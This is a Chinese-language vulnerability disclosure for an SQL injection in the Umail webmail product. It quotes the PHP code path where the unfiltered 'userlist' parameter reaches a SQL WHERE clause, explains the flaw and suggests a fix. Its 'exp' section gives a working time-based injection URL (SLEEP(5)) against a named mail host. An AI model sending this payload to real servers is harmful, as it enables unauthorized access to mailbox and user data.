Umail最新版SQL注入漏洞

漏洞文件:client\oab\module\operates.php Line: 321 [php]
if(ACTION == "save-to-pab") {
    include_once(LIB_PATH."PAB.php");
    $PAB = PAB::getinstance();
    $maillist_id = gss($_GET['maillist']);
    if($maillist_id) {
        ...
    } else {
        $user_ids = gss( $_GET['userlist'] ); //几乎无过滤,过滤空格和判断gpc
        if ( !$user_ids ) {
            dump_msg( "param_error", el( "参数错误!", "" ) );
        }
        $where = "t1.UserID IN (".$user_ids.")"; //问题?
        $arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, "", "", "", "", 0 );//跟踪getMailboxInfo
        $user_all = $arr_tmp['data'];
        if ( !$user_all ) {
            dump_json( array( "status" => TRUE, "message" => "" ) );
        }
        foreach ( $user_all as $user ) {
            $qq = $msn = "";
            if ( strpos( $user['qqmsn'], "@" ) ) {
                $msn = $user['qqmsn'];
            } else {
                $qq = $user['qqmsn'];
            }
            if ( !$PAB->getContactByMail( $user_id, $user['email'], "contact_id", 0 ) ) {
                $data = array(
                    "user_id" => $user_id,
                    "fullname" => $user['FullName'],
                    "pref_email" => $user['email'],
                    "pref_tel" => $user['teleextension'] ? $user['teleextension'] : $user['mobil'],
                    "birthday" => $user['birthday'],
                    "im_qq" => $qq,
                    "im_msn" => $msn,
                    "updated" => date( "Y-m-d H:i:s" )
                );
                $res = $PAB->add_contact( $data, 0 );
                if ( !$res ) {
                    dump_json( array( "status" => FALSE, "message" => el( "添加联系人时发生错误,添加失败!", "" ) ) );
                }
            }
        }
    }
    dump_json( array( "status" => TRUE, "message" => "" ) );
}

function gss( $_obfuscate_xyiNieq6, $_obfuscate_l9WoIzJ5Xg = FALSE ) {
    $_obfuscate_xyiNieq6 = trim( $_obfuscate_xyiNieq6 );
    if ( !ini_get( "magic_quotes_gpc" ) && $_obfuscate_l9WoIzJ5Xg ) {
        $_obfuscate_xyiNieq6 = addslashes( $_obfuscate_xyiNieq6 );
    }
    return $_obfuscate_xyiNieq6;
}

public function getMailboxInfo( $_obfuscate_AkPSczrCIu40, $_obfuscate_IRFhnYw = "", $_obfuscate_AedrEg = "", $_obfuscate_xvYeh9I = "", $_obfuscate_tUi30UB0e88 = "", $_obfuscate_u5srL4rM3PZJLvpPhQ = FALSE, $_obfuscate_ySeUHBw = FALSE ) {
    $_obfuscate_zbtFQY92OYenSG9u = "t1.DomainID='".$_obfuscate_AkPSczrCIu40."' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0";
    if ( $_obfuscate_IRFhnYw )
    {
        $_obfuscate_zbtFQY92OYenSG9u .= " AND ".$_obfuscate_IRFhnYw;//这行就足矣,代入SQL语句了
    }
    ....
[/php]
注: 调用处 gss( $_GET['userlist'] ) 只传了一个参数, 第二个参数默认为 FALSE, 所以 gss() 实际只做了 trim; 而 "t1.UserID IN (...)" 是不带引号的数字上下文, 即使 addslashes 生效也无法阻止注入。修复应在拼接 $where 之前将 $user_ids 按逗号拆分并逐项 intval 后再 implode, 或改用参数化查询。
exp [php]
http://mail.0day5.com/webmail/client/oab/index.php?module=operate&action=save-to-pab&userlist=1 AND SLEEP(5)
[/php]
SQLMAP截图证明: 7
